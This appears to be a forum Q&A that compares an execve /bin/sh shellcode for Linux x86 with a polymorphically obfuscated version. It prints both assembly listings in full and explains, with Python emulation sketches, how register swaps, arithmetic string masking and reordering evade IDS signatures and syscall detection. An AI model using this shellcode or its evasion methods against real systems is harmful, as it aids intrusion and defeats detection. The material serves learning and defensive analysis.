Explaining polymorphic obfuscation using the differences between two asm listings

2018-07-02 05:37:08

Here are two asm codes (copied from this forum polymorphic-shellcode):

Original asm before obfuscation:

global _start
section .text
_start:
    xor    eax,eax
    push   eax
    push   dword 0x68732f2f     ; //sh
    push   dword 0x6e69622f     ; /bin
    mov    ebx,esp
    mov    ecx,eax
    mov    edx,eax
    mov    al,0xb               ; execve()
    int    0x80
    xor    eax,eax
    inc    eax
    int    0x80

revised asm after obfuscation:

global _start           
section .text
_start:
    xor edx, edx            ;line 1
    push edx                ;line 2
    mov eax, 0x563ED8B7     ;line 3
    add eax, 0x12345678     ;line 4
    push eax                ;line 5
    mov eax, 0xDEADC0DE     ;line 6
    sub eax, 0x70445EAF     ;line 7
    push eax                ;line 8
    push byte 0xb           ;line 9
    pop eax                 ;line 10
    mov ecx, edx            ;line 11
    mov ebx, esp            ;line 12
    push byte 0x1           ;line 13
    pop esi                 ;line 14
    int 0x80                ;line 15
    xchg esi, eax           ;line 16
    int 0x80                ;line 17

It makes four changes:

1. Mask the /bin/sh string by doing arithmetic operations instead of pushing the hex values into the stack directly.

Q1.1: I can understand lines 3 to 8 (in the revised asm). What does line 9 mean? Is it equivalent to "mov al,0xb" in the original asm?

2. Use different registers than the original code where possible.

Q2.1: For example, does this refer to lines 1 and 2 (revised asm)?

Q2.2: I understand obfuscation as preventing an IDS from matching keywords, so why change registers?

3. Reorder instructions. Don't initialize the registers in the same order before calling execve.

Q3.1: I do not understand this. Can you explain it using the two asm listings above?

4. Introduce some unnecessary steps, e.g. push byte 0x1; pop esi; xchg esi,eax instead of popping to eax after the first int 0x80 instruction is executed.

Q4.1: In the original asm, why are there two int 0x80? I tried deleting the last int 0x80 and it still works.

Q4.2: Is adding unnecessary steps directly related to obfuscation?

Q5: Why "pop eax" in line 10?

Q1.1: I can understand lines 3 to 8 (in the revised asm). What does line 9 mean? Is it equivalent to "mov al,0xb" in the original asm?

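Lines 9 and 10 do push byte 0xb, pop eax, which is equivalent to mov eax,0x0000000b. In 32-bit mode, push byte sign-extends the 8-bit immediate to a full 32-bit value before storing it on the stack, and pop eax then loads all 32 bits, so al becomes 0xb and the rest of the eax register becomes zero. So it's actually replacing the xor eax,eax / mov al,0xb combination. The pair encodes as three bytes (6A 0B 58) with no zero bytes, whereas mov eax,0xb would embed three zero bytes in its immediate.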

push 0xb -> sub esp,4 / mov dword [ss:esp],0x0000000b ; memory at SS:ESP = 0x0000000b
pop eax  -> mov eax,[ss:esp] / add esp,4              ; ergo eax = 0x0000000b
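
To check the arithmetic in lines 3 to 8 together with the push/pop pair in lines 9 and 10, the first ten lines of the revised listing can be emulated in a few lines of Python. This is only a sketch: the names `sign_extend8`, `run_lines_1_to_10` and `stack_bytes` are made up for the illustration, and the stack is modelled as a plain list of 32-bit words rather than real memory.

```python
import struct

MASK32 = 0xFFFFFFFF  # registers are 32 bits wide, so arithmetic wraps at 2**32


def sign_extend8(value):
    """Sign-extend an 8-bit immediate to 32 bits, as `push byte` does in 32-bit mode."""
    value &= 0xFF
    return (value | 0xFFFFFF00) if value & 0x80 else value


def run_lines_1_to_10():
    """Emulate lines 1-10 of the revised listing; return (eax, stack words, top first)."""
    stack = []                            # stack[-1] models the dword at [esp]
    edx = 0                               # line 1: xor edx, edx
    stack.append(edx)                     # line 2: push edx (string terminator)
    eax = 0x563ED8B7                      # line 3
    eax = (eax + 0x12345678) & MASK32     # line 4
    stack.append(eax)                     # line 5
    eax = 0xDEADC0DE                      # line 6
    eax = (eax - 0x70445EAF) & MASK32     # line 7
    stack.append(eax)                     # line 8
    stack.append(sign_extend8(0x0B))      # line 9: push byte 0xb
    eax = stack.pop()                     # line 10: pop eax
    return eax, list(reversed(stack))


def stack_bytes(words):
    """Lay the dwords out as little-endian memory, lowest address first."""
    return b"".join(struct.pack("<I", word) for word in words)


eax, words = run_lines_1_to_10()
print(hex(eax))            # syscall number left in eax
print(stack_bytes(words))  # what ebx will point at after line 12
```

The add and sub results are the same two dwords that the original listing pushes directly, so the memory at esp ends up holding the same /bin//sh string followed by a zero dword.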

Q2.2: I understand obfuscation as preventing an IDS from matching keywords, so why change registers?

Many compilers use registers in a more or less standard manner. An advanced tool like IDA Pro can use this knowledge to decompile the assembly back to readable source code, especially if it can deduce which compiler produced the program. Mixing up registers makes it harder for a decompiler to translate the assembly code to higher-level (pseudo) source code. The same goes for an IDS that uses known code snippets to deduce what actions a program performs: changing a register changes the encoded bytes (xor eax,eax assembles to 31 C0, but xor edx,edx to 31 D2), so a byte signature taken from the original code no longer matches.
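
As a rough illustration of the signature point, the sketch below compares the first two instructions of each listing at the byte level. The encodings are hand-assembled (an assumption worth re-checking with nasm and objdump), and the "signature" is a hypothetical one invented for the example, not a rule from any real IDS.

```python
# Hand-assembled 32-bit encodings of the instructions that open each listing.
# Assumption: these match what nasm emits; verify with `nasm -f elf32` + `objdump -d`.
ENCODINGS = {
    "xor eax, eax": bytes([0x31, 0xC0]),
    "push eax": bytes([0x50]),
    "xor edx, edx": bytes([0x31, 0xD2]),
    "push edx": bytes([0x52]),
}


def assemble(instructions):
    """Concatenate the known encodings for a list of instruction strings."""
    return b"".join(ENCODINGS[text] for text in instructions)


def differing_offsets(a, b):
    """Return the byte offsets at which two equal-length sequences differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


original_prologue = assemble(["xor eax, eax", "push eax"])
revised_prologue = assemble(["xor edx, edx", "push edx"])

# Hypothetical signature: the exact bytes of the original prologue.
signature = original_prologue

print(signature in original_prologue)   # signature matches the original
print(signature in revised_prologue)    # same logic, different register
print(differing_offsets(original_prologue, revised_prologue))
```

Both sequences zero a register and push it as the string terminator, yet two of the three bytes differ, which is enough to defeat an exact byte match.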

Reorder instructions. Don't initialize the registers in the same order before calling execve. Q3.1: I do not understand this. Can you explain it using the two asm listings above?

If you use system calls, it is relatively easy to deduce what actions an application is performing. Linux (for example) stores the call number in eax, and every call takes its parameters in predetermined registers. By making it difficult for an analysis program to determine the value of eax, it becomes unclear which system call is being executed. Without this knowledge the meaning of the other registers (read: parameters) cannot be known. If you fill unused registers with nonsense values as well, then things become even harder to interpret.

The obfuscator does not want you to know it is calling syscall #11 (execve). The way to hide this is to load eax with 0xb in a roundabout manner. If we always load eax last (or first), then it becomes easier to figure out what is going on. If we load eax using 2 or more instructions, and we put lots of unrelated instructions in between, then it becomes harder to track the final value of eax before the int 0x80 which performs the syscall.
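
To make this concrete, here is a sketch of a deliberately naive scanner that only recognises `mov al, imm8` placed directly before `int 0x80`. The byte strings are hand-assembled from the two listings (an assumption worth re-checking with nasm and objdump), and `naive_syscall_number` is a hypothetical helper, far simpler than what a real analysis tool would do.

```python
import re

# Hand-assembled bytes of the two listings (assumption: matches nasm's output).
ORIGINAL = bytes.fromhex(
    "31c0 50 682f2f7368 682f62696e 89e3 89c1 89c2 b00b cd80 31c0 40 cd80"
)
REVISED = bytes.fromhex(
    "31d2 52 b8b7d83e56 0578563412 50 b8dec0adde 2daf5e4470 50 "
    "6a0b 58 89d1 89e3 6a01 5e cd80 96 cd80"
)

# B0 ib = mov al, imm8 ; CD 80 = int 0x80
NAIVE_PATTERN = re.compile(rb"\xb0(.)\xcd\x80", re.DOTALL)


def naive_syscall_number(code):
    """Return the imm8 of a `mov al, imm8` directly before `int 0x80`, else None."""
    match = NAIVE_PATTERN.search(code)
    return match.group(1)[0] if match else None


print(naive_syscall_number(ORIGINAL))  # the scanner recovers a syscall number
print(naive_syscall_number(REVISED))   # the scanner finds nothing to report
print(b"/bin" in ORIGINAL, b"/bin" in REVISED)
```

In the revised listing eax is loaded through push/pop five instructions before the int 0x80, so this pattern has nothing to latch onto. A tool that actually tracks register values would still recover the number, which is why this kind of obfuscation only raises the cost of analysis.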

Q4.1: In the original asm, why are there two int 0x80? I tried deleting the last int 0x80 and it still works. Q4.2: Is adding unnecessary steps directly related to obfuscation?

The second int 0x80 is a fallback. On success, execve replaces the process image and never returns, so the instructions after the first int 0x80 only run if execve fails. In that case the original code sets eax to 1 with xor eax,eax / inc eax (the revised code swaps in the 1 it stored in esi earlier). Syscall #1 happens to be sys_exit, which cleanly ends the process. When injecting the code into a program, the bytes after the inserted snippet are random garbage; we don't want to execute those and must thus exit cleanly. The call to sys_exit achieves this.
If you assemble this snippet as a stand-alone program and execve succeeds, the exit code is never reached. This is why removing the last int 0x80 seems to make no difference.
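
The "exec only comes back on failure" behaviour can be observed from Python on a POSIX system. The sketch below is an analogy rather than the shellcode itself: `os.execv` wraps the same execve system call, but it reports failure by raising `OSError` instead of returning a negative value in eax. The child script, the helper `run_child` and the path `/nonexistent/shell` are all made up for the example.

```python
import subprocess
import sys

# Child program: try to exec, and reach the fallback only if exec fails.
CHILD = r"""
import os, sys
target = sys.argv[1]
try:
    os.execv(target, [target, "-c", "print('new image running')"])
except OSError:
    # Plays the role of the trailing sys_exit in the shellcode.
    print("exec failed, falling through to exit")
    sys.exit(1)
print("never reached")
"""


def run_child(target):
    """Run CHILD in a separate interpreter; return (exit status, captured stdout)."""
    result = subprocess.run(
        [sys.executable, "-c", CHILD, target],
        capture_output=True,
        text=True,
    )
    return result.returncode, result.stdout.strip()


print(run_child(sys.executable))        # exec succeeds: only the new image prints
print(run_child("/nonexistent/shell"))  # exec fails: the fallback exit path runs
```

When the exec succeeds, nothing after it in the child ever runs, which mirrors why the second int 0x80 is dead code whenever /bin//sh starts successfully.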

Q5: Why "pop eax" in line 10?

First 0xb is pushed, then it is popped into eax, essentially performing a mov eax,0xb.
